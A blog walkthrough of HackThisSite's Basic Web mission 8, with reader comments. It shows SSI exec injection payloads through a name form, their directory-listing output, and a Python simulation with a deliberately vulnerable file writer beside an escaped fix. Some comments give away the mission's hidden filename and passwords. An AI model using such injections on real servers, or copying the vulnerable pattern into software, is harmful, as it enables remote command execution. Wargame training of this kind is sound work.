HTS Basic Web 8: Evil SSI

Network Security Sam never seems to learn from his mistakes. In mission 8 of the basic web missions, Sam has made the exact same mistake as in mission 7: he relies on security through obscurity, which is never a good idea. This time, he saved an unencrypted password file under an obscure name somewhere in /var/www/hackthissite.org/html/missions/basic/8/. Last time, we used Sam’s insecure cal script. This time, his daughter Stephanie has put up a handy script for us.

Try out Stephanie’s name script. You’ll find out that whatever you input into that box is saved, wrapped in some additional text, to a file with a random name and the .shtml extension, and you are pointed at that file. The extension is the hint: .shtml files are passed through the server’s SSI processor before they are sent to the browser. SSI (Server Side Includes) is a set of directives, written as HTML comments of the form <!--#directive attribute="value" -->, that the web server evaluates while serving a file, a bit like a very limited PHP. By far the most common use of SSI is to include shared header and footer files. The syntax of an SSI include looks like this:

<!--#include virtual="header.html" -->

You only need to use one directive for this mission, exec. With the cmd attribute, exec hands the given string to /bin/sh on the server and splices the command’s output into the page, so whatever you manage to write into the .shtml file, the server will run. (On Apache this only works where the directory is configured with Options +Includes; with Options +IncludesNOEXEC the include directive still works but exec is refused, which is the setting you want anywhere user input ends up in a .shtml file.) Note that the mission only lets through commands it considers relevant to finding the password file, so stick to listing directories. Remember from the last mission what the command for listing all the files in a directory was? Try using it. Enter this into the name field:

<!--#exec cmd="ls" -->

This is the output I got:

Hi, tshngmww.shtml hipykpqu.shtml ztxdhjxn.shtml avpfeoie.shtml fviqpmaw.shtml kqbybdzc.shtml dzrnmzgx.shtml npcsygfl.shtml whqxxojt.shtml ylomcmvu.shtml uhdppswp.shtml gzntiicx.shtml dzwbqiuu.shtml qvzuieng.shtml smcerykh.shtml qjhnmhmq.shtml znodwztr.shtml!

Your name contains 254 characters.

Looks great, except one thing. It’s the wrong directory. If you look at the URL, it will say something like this:

http://www.hackthissite.org/missions/basic/8/tmp/nxlvdjcp.shtml

We need to list the directory one level up. The relative path to the parent directory is always .., and since the command runs with the served file’s directory (tmp/) as its working directory, we can list the files of the parent directory (/missions/basic/8/) with the following SSI code:

<!--#exec cmd="ls .." -->

After you have found the obscure filename in the file list, you can simply open it in your browser (it lives in /missions/basic/8/, not in the site root) and read the password.
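The whole mechanism in one place, as an added example that is not part of the original post or the site’s code: a small Python simulation of Stephanie’s script and of the server’s SSI pass. The directory layout, the placeholder file names (including the “obscure” password file x7q2p1m9.php) and the exec-only evaluator are assumptions made for the demonstration; real Apache mod_include handles more directives, but it does run exec cmd through /bin/sh with the served file’s directory as the working directory, which is exactly why plain ls showed only the tmp files and ls .. showed the password file. The hardened variant shows the actual fix: HTML-escape user input before it is written into any file the SSI processor will read, so the opening <!-- never survives.

```python
"""Simulation of the HTS Basic 8 name script and the server's SSI pass.

Added example, not the site's code. Paths, file names and the exec-only
evaluator are assumptions for the demonstration.
"""
import html
import os
import re
import subprocess
import tempfile

# Apache-style exec directive: <!--#exec cmd="..." -->
SSI_EXEC = re.compile(r'<!--#exec\s+cmd="([^"]*)"\s*-->')


def make_mission_tree() -> str:
    """Constructed layout mirroring /missions/basic/8/: the scripts, an
    obscurely named password file (assumed name) and an empty tmp/ directory."""
    root = tempfile.mkdtemp(prefix="hts8_")
    for name in ("index.php", "level8.php", "x7q2p1m9.php"):
        with open(os.path.join(root, name), "w") as f:
            f.write("<?php /* placeholder */ ?>\n")
    os.mkdir(os.path.join(root, "tmp"))
    return root


def save_name_vulnerable(root: str, name: str) -> str:
    """Stephanie's script as the post describes it: the user's input is
    written verbatim into tmp/<random>.shtml. The verbatim write is the bug."""
    fd, path = tempfile.mkstemp(suffix=".shtml", dir=os.path.join(root, "tmp"))
    with os.fdopen(fd, "w") as f:
        f.write(f"Hi, {name}!\n\nYour name contains {len(name)} characters.\n")
    return path


def save_name_hardened(root: str, name: str) -> str:
    """Same script with the fix: escape the input so '<' becomes '&lt;' and
    the SSI parser never sees a directive."""
    return save_name_vulnerable(root, html.escape(name, quote=True))


def render_shtml(path: str) -> str:
    """Stand-in for the server's SSI pass over a .shtml file: each exec
    directive is run through the shell with the file's own directory as the
    working directory, and its stdout replaces the directive in the page."""
    workdir = os.path.dirname(path)
    with open(path) as f:
        body = f.read()

    def run(match: re.Match) -> str:
        proc = subprocess.run(match.group(1), shell=True, cwd=workdir,
                              capture_output=True, text=True)
        return proc.stdout

    return SSI_EXEC.sub(run, body)


def run_mission(root: str) -> dict:
    """Replay the post's two steps against the vulnerable script, then send
    the same payload to the hardened one. Returns the three rendered pages."""
    return {
        "ls": render_shtml(save_name_vulnerable(root, '<!--#exec cmd="ls" -->')),
        "ls ..": render_shtml(save_name_vulnerable(root, '<!--#exec cmd="ls .." -->')),
        "hardened": render_shtml(save_name_hardened(root, '<!--#exec cmd="ls .." -->')),
    }


if __name__ == "__main__":
    for label, page in run_mission(make_mission_tree()).items():
        print(f"--- {label} ---\n{page}")
```

The "ls" page lists only .shtml files because the directive executes inside tmp/; the "ls .." page lists the parent, password file included; the hardened page shows the escaped directive as literal text and runs nothing.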


54 Comments »

  1. Can someone help me? I am on basic 8 and when I put it “” I got this “If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.”

    Will someone please help me?

    Comment by SalidifiedPumpkin — January 27, 2007 @ 5:11 am

  2. SalidifiedPumpkin, my bad. The quotation marks on my page are typographical, not the regular " ones. Just type the code in yourself, and it should work.

    Comment by Tim — January 28, 2007 @ 4:00 pm

  3. wrote: in this box but it comes :
    if you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.
    again, please help me

    Comment by beginner — February 3, 2007 @ 12:21 pm

  4. i wrote

    Comment by beginner — February 3, 2007 @ 12:22 pm

  5. beginner, use cmd=”ls”. Other commands won’t work, as the error says.

    Comment by Tim — February 3, 2007 @ 4:15 pm

  6. If I use cmd=”ls” then a list with 14 shtmls appears. Do I have to manipulate the URL or the “enter your name” box?

    Please tell it in easy words, I don’t speak English very well.

    Comment by beginner — February 4, 2007 @ 10:41 am

  7. beginner, sorry — it’s the wrong directory. You should use cmd=”ls ..” in order to find the filelist of the directory above.

    Comment by Tim — February 4, 2007 @ 11:52 am

  8. yo tim i got up 2 the but when i hit enter it says “If you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.” So what do I do?

    Comment by Da'Von — March 3, 2007 @ 7:08 pm

  9. Alright, I got past the problem with having to change the command, but now I see 3 things and I don’t know what to do with them.

    Comment by Da'Von — March 3, 2007 @ 7:36 pm

  10. Ok, I got it now.

    Comment by Da'Von — March 3, 2007 @ 11:23 pm

  11. You really should make the directions a little clearer. I got it, but it took me a while.

    Comment by jackhomo — March 13, 2007 @ 1:59 am

  12. it needs to be this:
    l, s, space, dot, dot

    other wise it will come up with the error

    Comment by andrew — March 13, 2007 @ 3:12 am

  13. jackhomo, in which way should they be clearer?

    Comment by Tim — March 13, 2007 @ 5:29 am

  14. Hi, I keep getting the error that tells me to make the code more simple…. Help?

    Comment by Anonymus — March 15, 2007 @ 1:32 pm

  15. Directions are very clear.

    Although when I enter the obscure filename in my browser, I get a 404 not found page. I’m assuming the correct URL for the password is http://www.hackthissite.org/*obscurefilename*.php

    There must be something I am doing wrong.

    Comment by rap1df1re — March 20, 2007 @ 6:32 pm

  16. rap1df1re: Remember the rest of the URL. It should be http://www.hackthissite.org/missions/basic/8/*obscurefilename*.shtml

    Comment by Tim — March 21, 2007 @ 1:08 am

  17. No that did not work either. I am beginning to believe there’s a bug on this level. See if you can figure it out.

    Comment by rap1df1re — March 21, 2007 @ 3:52 am

  18. rap1df1re, what output do you get after executing the first command, and exactly what URL do you go to afterwards?

    Comment by Tim — March 21, 2007 @ 2:46 pm

  19. Hi, au12ha39vc.php index.php level8.php tmp!

    Your name contains 39 characters.

    I then use the url -

    http://www.hackthissite.org/au12ha39vc.php

    which returns….

    Not Found
    The requested URL /au12ha39vc.php was not found on this server.

    Apache/1.3.37 Server at http://www.hackthissite.org Port 80

    Comment by rap1df1re — March 21, 2007 @ 8:37 pm

  20. rap1df1re, try this URL instead:

    http://www.hackthissite.org/missions/basic/8/au12ha39vc.php

    Remember that it is in the same directory, not in the root directory!

    Comment by Tim — March 21, 2007 @ 9:33 pm

  21. Look, I have put everything in. One time it came up, but it was the wrong directory. So I put the little (..) in it, but then it says to manipulate the code, so I tried but couldn’t figure it out. So I used some of the ones on this site and others. But I keep getting the little name thing with no URLs. Please help me.

    Comment by lenice — April 12, 2007 @ 1:56 pm

  22. i’m not sure if my last comment went through

    Comment by lenice — April 12, 2007 @ 2:04 pm

  23. Ok so I did everything right, but it’s still coming up with the name crap. I don’t know how to manipulate my code, and the ones on here just bring me back to the name stuff with no URLs. Please help me.

    Comment by lenice — April 12, 2007 @ 2:06 pm

  24. lenice, the “name stuff” is a list of the files in the current directory, hackthissite.org/missions/8/. Just append the filename to the end of that URL.

    Comment by Tim — April 12, 2007 @ 9:32 pm

  25. i’m not getting any file names,i get

    hi,(what ever i typed in)
    your name has (however many letters).

    Comment by lenice — April 13, 2007 @ 1:03 pm

  26. lenice, instead of typing your name in, you should type in the SSI injection described in the post.

    Comment by Tim — April 13, 2007 @ 1:38 pm

  27. I did. I don’t type my name, I type exactly what these forums and stuff say. And I read everything I can find on SSI.

    Comment by Anonymous — April 13, 2007 @ 10:02 pm

  28. Anonymous: Then what happens? Also, can you type exactly what you type? Please substitute < and > for &lt; and &gt;, so that this blog won’t think it’s a tag.

    Comment by Tim — April 14, 2007 @ 11:05 am

  29. Thanks for the well written tip. I had been trying to use the cd command followed by ls, but that wouldn’t work. Using ls .. makes sense, but is there a way to use the cd command? What would that look like?

    Comment by Peace — April 22, 2007 @ 5:25 pm

  30. Peace: The cd command would probably work just fine if you did something like:

    <!--#exec cmd="cd .. && ls"-->

    That code would first execute cd .., going to the previous directory. ls would then be executed, giving the list of file names.

    I suppose that the alternative codes were omitted for the sake of simplicity.

    Comment by Tim — April 23, 2007 @ 8:09 pm

  31. Peace be upon ya..
    thanx,for making me proceed in this mission.

    Comment by Amad_Kaslan — April 28, 2007 @ 4:17 pm

  32. I don’t get what I have to enter in the file name. When I enter what they say, it does the same thing as if I enter anything else!!!

    Comment by jean — May 11, 2007 @ 11:00 pm

  33. nvm

    Comment by jean — May 11, 2007 @ 11:05 pm

  34. I’m totally confused. Where do i type the comand :

    ??????

    Comment by HFF — May 14, 2007 @ 1:02 am

  35. Thanks Tim, this, and everything on this site is really helpful

    Comment by glenn — June 1, 2007 @ 6:55 am

  36. in the name box you type

    make sure you only type 2 dots. this worked for me.

    Comment by MICHhimself — July 3, 2007 @ 11:51 pm

  37. Comment by Anonymous — November 18, 2007 @ 4:00 pm

  38. Comment by Anonymous — November 18, 2007 @ 4:02 pm

  39. try it at IE.

    Comment by Avi — January 6, 2008 @ 11:10 am

  40. ok i did it but i will never know how here is the password for all of you

    ad293aca

    but the person that made this site needs to be a bit more clear

    Comment by louis — January 30, 2008 @ 7:46 pm

  41. they have changed it.

    Comment by deceylon — February 10, 2008 @ 8:02 pm

  42. No matter what I put in for the SSI to run it won’t work. Typing in , , or any variation, even doesn’t work. Tried with quotes, without, etc… the message “if you are trying to use server side includes to solve the challenge, you are on the right track: but I have limited the commands allowed to ones relevant towards finding the password file for security reasons(because there will always be that one person who decides to execute some rather nasty commands). So please manipulate your code so that it is a little more pertaining to the level.” always appears. I cannot think of any other unix command to list files, and I can’t think of another way to get the file. I have “cheated” and beat the password by getting the file name from somewhere else. But I cannot see how this mission is beatable now. Anyone have any ideas?

    Comment by Alex — April 4, 2008 @ 7:34 pm

  43. This is exactly what you need to put in the box where it says “Name”:

    This is going to give you:

    Hi, au12ha39vc.php index.php level8.php tmp!

    Your name contains 39 characters.

    Pick au12ha39vc.php

    Comment by [system] — May 12, 2008 @ 2:06 am

  44. i dont get it..

    Comment by bladeruin — May 16, 2008 @ 10:57 am

  45. Ok, so I am going to put my question very simply: “HUH?!?!?!”
    What the article said went in one ear and out the other. Could anyone rephrase that in stupid language for people like me? Thanks, you’re all awesome!

    Comment by major noob! — June 13, 2008 @ 12:42 am

  46. The password is ddba81c6

    Comment by HTS — June 22, 2008 @ 10:17 am

  47. Go to:
    http://www.hackthissite.org/missions/basic/8/au12ha39vc.php

    for the pass

    Comment by L33T H4Z3 — June 28, 2008 @ 8:50 am

  48. L33T H4Z3: That wouldn’t teach them very much, would it?

    Comment by Tim — July 2, 2008 @ 7:39 am

  49. For those who this is unclear. In the name field type the following without the parenthesis and press submit(#exec cmd=”ls ..”) But.. Some later browser versions manipulate your input field. I verified by sniffing my traffic when it was failing for me, and my browser firefox 3.0 was dropping the # and it would not work. So if this hack is not working for some people (where you just get “hi #exec cmd=”ls ..”" Rather than a list of files, try an older version of browser. Having older software in your arsenal of tools is a good thing!! Joshua.parker@supportitonline.com

    Comment by josh — July 5, 2008 @ 8:54 pm

  50. Type this into the name field

    <!--#exec cmd="ls .." -->

    follow through to saved file and copy paste filename given into url bar like this:

    http://www.hackthissite.org/missions/basic/8/au12ha39vc.php

    (might have to put your own ” in directly with your own keyboard).

    Hope thats english enough, as took me awhile to understand everything above.

    Comment by David — August 1, 2008 @ 8:42 pm

  51. i feel nubish, but wtf, why doesn’t any of this work? and the code is missing in the actual page (i see plenty of comments with it, just not the code itself)

    Comment by Nosidius — August 8, 2008 @ 11:06 pm

  52. is what I found that is close to working, and yes I added the ..’s and it still gave me the security error. wtf am I doing wrong? As far as I’ve seen that’s the code I SHOULD need for getting to it >.> and I tried experimenting by editing out parts: you cannot get rid of the arrows, and both CMD and exec have to stay, because then it gives the error msg again.

    Comment by Nosidius — August 8, 2008 @ 11:39 pm

  53. The command should be like this:

    P.S.: do not copy it directly (typographical errors may occur)

    when it says the file is saved, open the link given and copy the directory! :-)

    Comment by Zul — September 14, 2008 @ 5:22 pm

  54. Will somebody lend a guy a hand? :) It says I have to make things more pertaining to the level… simple instructions maybe?

    Comment by Anonymous — September 18, 2008 @ 8:47 pm
